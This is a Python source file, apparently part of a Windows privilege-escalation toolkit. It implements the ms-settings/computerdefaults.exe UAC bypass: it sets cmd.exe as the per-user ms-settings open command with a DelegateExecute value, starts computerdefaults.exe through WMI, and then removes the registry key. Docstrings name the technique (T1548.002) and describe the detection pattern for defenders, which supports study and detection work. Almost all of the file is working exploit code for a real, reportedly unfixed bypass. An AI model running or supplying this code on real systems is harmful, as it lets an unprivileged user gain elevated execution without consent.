computerdefaults.py
"""
Works from: Windows 10 TH1 (10240)
Fixed in: unfixed
"""
import os
import wmi
import time
import _winreg
import win32con
from colorama import init, Fore
# Initialise colorama for the Windows console; convert=True is understood to
# make it translate ANSI colour sequences into Win32 console calls.
init(convert=True)
# NOTE(review): this rebinds the name `wmi` from the imported module to a WMI
# connection object, so the module itself is no longer reachable after this line.
wmi = wmi.WMI()
# Command string that computerdefaults() writes as the default value of the
# per-user ms-settings open-command key.
payload = "c:\\windows\\system32\\cmd.exe"
def successBox():
    """Return the green ``[+]`` tag that prefixes success messages."""
    return "".join((Fore.GREEN, '[+]', Fore.RESET))
def errorBox():
    """Return the red ``[-]`` tag that prefixes failure messages."""
    return "".join((Fore.RED, '[-]', Fore.RESET))
def infoBox():
    """Return the cyan ``[!]`` tag that prefixes progress messages."""
    return "".join((Fore.CYAN, '[!]', Fore.RESET))
def warningBox():
    """Return the yellow ``[!]`` tag (same glyph as infoBox, different colour)."""
    return "".join((Fore.YELLOW, '[!]', Fore.RESET))
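def computerdefaults():
    """Override the per-user ``ms-settings`` handler, start computerdefaults.exe, then remove the override.

    This is the publicly documented ms-settings handler hijack, a UAC-bypass
    technique (MITRE ATT&CK T1548.002). The function performs three steps,
    each of which is observable in host telemetry:

    1. Writes ``payload`` as the default value of
       ``HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command`` and adds a
       ``DelegateExecute`` value next to it.
    2. Starts ``computerdefaults.exe`` through WMI ``Win32_Process.Create``.
    3. Deletes the ``command`` key again.

    Defender note: a standard-user write to that HKCU key (especially together
    with a ``DelegateExecute`` value), followed shortly by computerdefaults.exe
    spawning a child process, is the detection pattern for this technique.

    Returns:
        False when the key cannot be created, when the process-creation call
        raises, or when the key cannot be deleted. Otherwise the function
        falls off the end and returns None, including when WMI reports a
        non-zero result.
    """
    # Raw string: the backslashes are registry path separators, not escapes.
    # (The original wrapped this in a single-argument os.path.join, a no-op.)
    handler_key = r"Software\Classes\ms-settings\shell\open\command"

    print(" {} computerdefaults: Attempting to create registry key".format(infoBox()))
    try:
        key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, handler_key)
        try:
            # Default value of the key: the command the handler will run.
            _winreg.SetValueEx(key, None, 0, _winreg.REG_SZ, payload)
            # Value data is passed as None; presumably stored as an empty
            # string by _winreg (confirm).
            _winreg.SetValueEx(key, "DelegateExecute", 0, _winreg.REG_SZ, None)
        finally:
            # Close the handle even when one of the writes fails; the original
            # leaked it on that path.
            _winreg.CloseKey(key)
        print(" {} computerdefaults: Registry key created".format(successBox()))
    except Exception:
        print(" {} computerdefaults: Unable to create key".format(errorBox()))
        return False

    print(" {} computerdefaults: Pausing for 5 seconds before executing".format(infoBox()))
    time.sleep(5)

    print(" {} computerdefaults: Attempting to create process".format(infoBox()))
    try:
        startup = wmi.Win32_ProcessStartup.new(ShowWindow=win32con.SW_SHOWNORMAL)
        result = wmi.Win32_Process.Create(
            CommandLine="cmd.exe /c start computerdefaults.exe",
            ProcessStartupInformation=startup)
        # result[1] is presumably the WMI return code, with 0 meaning success.
        if result[1] == 0:
            print(" {} computerdefaults: Process started successfully".format(successBox()))
        else:
            print(" {} computerdefaults: Problem creating process".format(errorBox()))
    except Exception:
        print(" {} computerdefaults: Problem creating process".format(errorBox()))
        # NOTE(review): returning here skips the delete step below, so the
        # handler override stays in HKCU. On a lab host it has to be removed
        # by hand; for responders a leftover value under this key is an
        # artifact of a run.
        return False

    print(" {} computerdefaults: Pausing for 5 seconds before cleaning".format(infoBox()))
    time.sleep(5)

    print(" {} computerdefaults: Attempting to remove registry key".format(infoBox()))
    try:
        # Only the leaf "command" key is deleted; the parent keys that
        # CreateKey may have created (ms-settings\shell\open) are left behind.
        _winreg.DeleteKey(_winreg.HKEY_CURRENT_USER, handler_key)
        print(" {} computerdefaults: Registry key was deleted".format(successBox()))
    except Exception:
        print(" {} computerdefaults: Unable to delete key".format(errorBox()))
        return False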